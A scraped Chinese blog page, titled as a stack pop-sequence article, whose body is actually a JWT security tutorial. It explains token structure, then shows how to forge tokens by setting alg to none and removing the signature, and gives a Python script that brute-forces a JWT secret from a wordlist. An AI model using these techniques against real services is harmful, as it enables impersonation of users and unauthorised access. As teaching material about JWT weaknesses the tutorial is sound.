2. 程式人生 > 其它 >出棧序列問題

出棧序列問題

阿新 發佈:2022-04-04

一、介紹

1、使用者端登入,使用者名稱和密碼在請求中被髮往伺服器

2、(確認登入資訊正確後)伺服器生成 JSON 頭部和宣告,將登入資訊寫入 JSON 的宣告中(通常不 應寫入密碼,因為 JWT 是不加密的),並用 secret 用指定演算法進行加密,生成該使用者的 JWT。此時, 伺服器並沒有儲存登入狀態資訊。

3、伺服器將 JWT(通過響應)返回給客戶端

4、使用者下次會話時,客戶端會自動將 JWT 寫在 HTTP 請求頭部的 Authorization 欄位中

5、伺服器對 JWT 進行驗證,若驗證成功,則確認此使用者的登入狀態

6、伺服器返回響應

7、JWT由三部分組成,頭部,宣告,簽名,以.
間隔

eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1Njk4MDk1MDQsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiSmVycnkifQ.lHBU1BzLM9_GB6qfcSljmCreLyNytlv5aGIx2QKZBHva1Y1XB9LST7lE3UcbGTToUKoMNIxkqcCdaX-J7yDyHQ

頭部:eyJhbGciOiJIUzUxMiJ9

宣告:eyJpYXQiOjE1Njk4MDk1MDQsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiSmVycnkifQ

簽名(金鑰secret和頭部中的alg加密方式組成):lHBU1BzLM9_GB6qfcSljmCreLyNytlv5aGIx2QKZBHva1Y1XB9LST7lE3UcbGTToUKoMNIxkqcCdaX-J7yDyHQ

 
alg:簽名的加密方式

iat:jwt的簽發時間

exp:jwt的過期時間,這個過期時間必須要大於簽發時間

iss: jwt簽發者

sub: jwt所面向的使用者

aud: 接收jwt的一方

nbf: 定義在什麼時間之前,該jwt都是不可用的.

jti: jwt的唯一身份標識,主要用來作為一次性token,從而回避重放攻擊。

二、繞過簽名登入

1、前提是後端沒有對簽名進行驗證,導致我們可以繞過

2、頭部和宣告都是base64加密的,可以解密出一些基本資訊

3、我們偽造基本資訊,然後將alg加密方式置為none或者secret置為[],使得簽名失效,然後base64加密,構造新的JWT

4、將簽名刪掉,然後拼接頭部和宣告

5、在HTTP傳輸過程中,Base64編碼中的"=","+","/"等特殊符號通過URL解碼通常容易產生歧義,因此產生了與URL相容的Base64URL編碼在Base64URL編碼中,"+"會變成"-","/"會變成"_","="會被去掉,以此達到url safe的目的

6、替換資料包中的JWT,從而繞過身份驗證

三、爆破簽名金鑰

import jwt
import termcolor
if __name__ == "__main__":
    jwt_str = R'eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1Njk3MjI2NDQsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0.Y2WgbXt9wjv4p4BdM_tA9f05sG-_n1ugojijOZMXx2_Gld_Ip4dOazj9K3iWVC68W_7_HEyu2_c0qSjtqDC0Vg'
    with open('/YOUR-PATH/Top1000.txt') as f:
        for line in f:
            key_ = line.strip()
            try:
                jwt.decode(jwt_str, verify=True, key=key_)
                print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except jwt.exceptions.InvalidSignatureError:
                print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
                continue
        else:
            print('\r', '\bsorry! no key be found.')

1、爆破出來金鑰,然後自己構造JWT,從而導致任意使用者登入

相關推薦

C++之的應用-------判斷序列是否合法

//合法的佇列 //已知從1至n的數字序列,按順序入,每個數字入後即可,也可在中停留,

pta ds c語言 7-2 序列的合法性 (25分) 簡單思路

7-2出棧序列的合法性(25分) 給定一個最大容量為M的堆疊,將N個數字按 1, 2, 3, ...,N的順序入,允許按任何順序出棧,則哪些數字序列是不可能得到的?例如給定M=5、N=7,則我們有可能得到{ 1, 2, 3, 4,

2020-12-28 序列的合法性

技術標籤:AC的題解分享堆疊演算法資料結構 給定一個最大容量為 M 的堆疊,將 N 個數字按 1, 2, 3, …, N 的順序入,允許按任何順序出棧,則哪些數字序列是不可能得到的?例如給定 M=5、N=7,則我們有可能得到

關於序列的解法總結及卡特蘭數的學習(C語言)

次序 一個(無窮大)的進序列為1,2,3,…,n,有多少個不同的序列?

序列問題

序列問題 之根本——後進先(Last In First Out,LIFO) 要解決這類問題:最本質就是的時候,可以邊入

PTA 序列的合法性

給定一個最大容量為 M 的堆疊,將 N 個數字按 1, 2, 3, ..., N 的順序入,允許按任何順序出棧,則哪些數字序列是不可能得到的?例如給定 M=5、N=7,則我們有可能得到{ 1, 2, 3, 4, 5, 6, 7 },但不可能得到

輸入兩個整數序列,第一個序列表示的壓入順序, 請判斷第二個序列是否可能為該的彈順序。假設壓入的所有數字均不相等。 例如序列1,2,3,4,5是某的壓入順序,序列4,5,3,2,1是該壓棧序列對應的一個彈出序列, 但4,3,5,1,2就不可能是該壓棧序列的彈出序列。(注意:這兩個序列的長度是相等的)

思路 根據出棧順序模擬一次入元素 等於出棧順序第一個時就 該元素就可以出棧了比如 入12345 出棧順序45321入1 出棧順序第一個是4嘛 說明只有入到4才會啊 -》4321 -》入到4了 相等那就-》321繼續正常入5321

python的基本定義與使用方法示例【初始化、賦值、入等】

本文例項講述了python的基本定義與使用方法。分享給大家供大家參考,具體如下:

Java定義結構,並實現入操作完整示例

本文例項講述了Java定義結構,並實現入操作。分享給大家供大家參考,具體如下:

資料結構C語言實現----操作

程式碼如下: #include<stdio.h> #include<stdlib.h> typedef struct { char *base; char *top;

進出序列問題詳解

連結:https://ac.nowcoder.com/acm/contest/1005/B 題目描述 一列火車n節車廂,依次編號為1,2,3,…,n。每節車廂有兩種運動方式,進,問n節車廂的可能排列方式有多少種。

P4387 【深基15.習9】驗證序列

+ 模擬 #include<iostream> #include<stack> #include<vector> #include<cstdio>

資料結構:順序的建立、初始化、入、輸出(C語言)

技術標籤:資料結構資料結構指標演算法c語言資料分析 大一學C語言的時候還沒覺得有啥難的,直到現在學了資料結構。。。

輸出所有可能的順序

技術標籤:學習記錄 #include <stdio.h> #include<stdlib.h> typedef struct //構造類結構體

(C語言記憶體十五)用一個例項來深入剖析函式進的過程

前面我們只是講解了一個函式的活動記錄是什麼樣子的,相信大家對函式的詳細呼叫過程的認識還不是太清晰,這節我們就以 VS2010 Debug 模式為例來深入分析一下。

946. 驗證序列

給定pushed和popped兩個序列,每個序列中的 值都不重複,只有當它們可能是在最初空上進行的推入 push 和彈 pop 操作序列的結果時,返回 true;否則,返回 false。

C/C++ 函式呼叫過程,壓

在x86的計算機系統中,記憶體空間中的主要用於儲存函式的引數,返回值,返回地址,本地變數等。一切的函式呼叫都要將不同的資料、地址壓入或者彈出棧。因此,為了更好地理解函式的呼叫,我們需要先來看看是怎麼

判斷順序合法性

順序合法性是指給定一系列元素,如1 - N,按照從小到大的方式入,每個元素的時機不定。題目給定一個順序,我們來判斷這個順序有沒有可能發生。

兩個佇列實現一個,可以連續,入時調整好順序 C++

#include<iostream>#include<queue> using namespace std; struct stack{ queue<int> que1; queue<int> que2; static int STACK_EMPTY;

劍指Offer_#31_的壓入、彈序列

劍指Offer_#31_的壓入、彈出序列劍指offer Contents 題目思路分析解答 題目 輸入兩個整數序列,第一個序列表示的壓入順序,請判斷第二個序列是否為該的彈順序。假設壓入的所有數字均不相等。例如,序